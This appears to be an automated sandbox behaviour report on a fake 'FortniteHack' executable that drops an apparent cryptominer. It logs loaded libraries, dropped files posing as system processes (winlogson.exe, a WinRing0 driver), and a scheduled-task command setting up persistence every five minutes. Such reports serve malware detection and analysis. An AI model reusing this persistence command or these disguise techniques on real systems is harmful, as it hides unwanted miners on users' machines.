Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: FortniteHack.exe1.exe

Static file information: File size 1365504 > 1048576

Source: FortniteHack.exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: FortniteHack.exe1.exe, 00000002.00000003.2023753844.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023196435.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023358262.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000000.1423389973.0000000000ED2000.00000002.00000001.01000000.00000008.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.15.dr

Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr

Static PE information: 0x9A21587A [Mon Dec 11 03:03:22 2051 UTC]

Source: FortniteHack.exe1.exe	Static PE information: real checksum: 0x0 should be: 0x152ee6
Source: winlogson.exe.15.dr	Static PE information: real checksum: 0x7e7c4c should be: 0xb303e
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x11c88

Source: winlogson.exe.15.dr

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EFDFCA push ecx; ret	0_2_00EFDFDD
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_3_00BD8E30 push eax; ret	2_3_00BD8E31
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_3_00BDBE2E push ecx; iretd	2_3_00BDBE2F
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_004551FC push edi; ret	2_2_00455348
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_004552EA push edi; ret	2_2_00455348
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_0044F492 push esi; ret	2_2_0044F493
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_0044F4A7 push edi; iretd	2_2_0044F4A8
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9320F push 450FF716h; ret	2_2_00E93214
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E93BED push 450FC903h; ret	2_2_00E93BF5
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E93BF9 push 440FC903h; ret	2_2_00E93BFF
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED04F7 push ebx; iretd	2_2_00ED04F9
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED04DD push ebx; iretd	2_2_00ED04E3
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EFDFCA push ecx; ret	2_2_00EFDFDD
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EBA775 push es; iretd	2_2_00EBA776
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_02AFC672 push esp; ret	18_2_02AFC679
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_02AFC670 pushad ; ret	18_2_02AFC671
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_02AF6821 push eax; ret	18_2_02AF6833
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_02AF0DB0 push edi; ret	18_2_02AF0DD2

Source: FortniteHack.exe1.exe

Static PE information: section name: .text entropy: 7.09207256696417

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

File created: C:\ProgramData\Dllhost\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	File created: C:\ProgramData\Dllhost\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	File created: C:\ProgramData\Dllhost\winlogson.exe	Jump to dropped file
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File created: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	File created: C:\ProgramData\Dllhost\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	File created: C:\ProgramData\Dllhost\winlogson.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
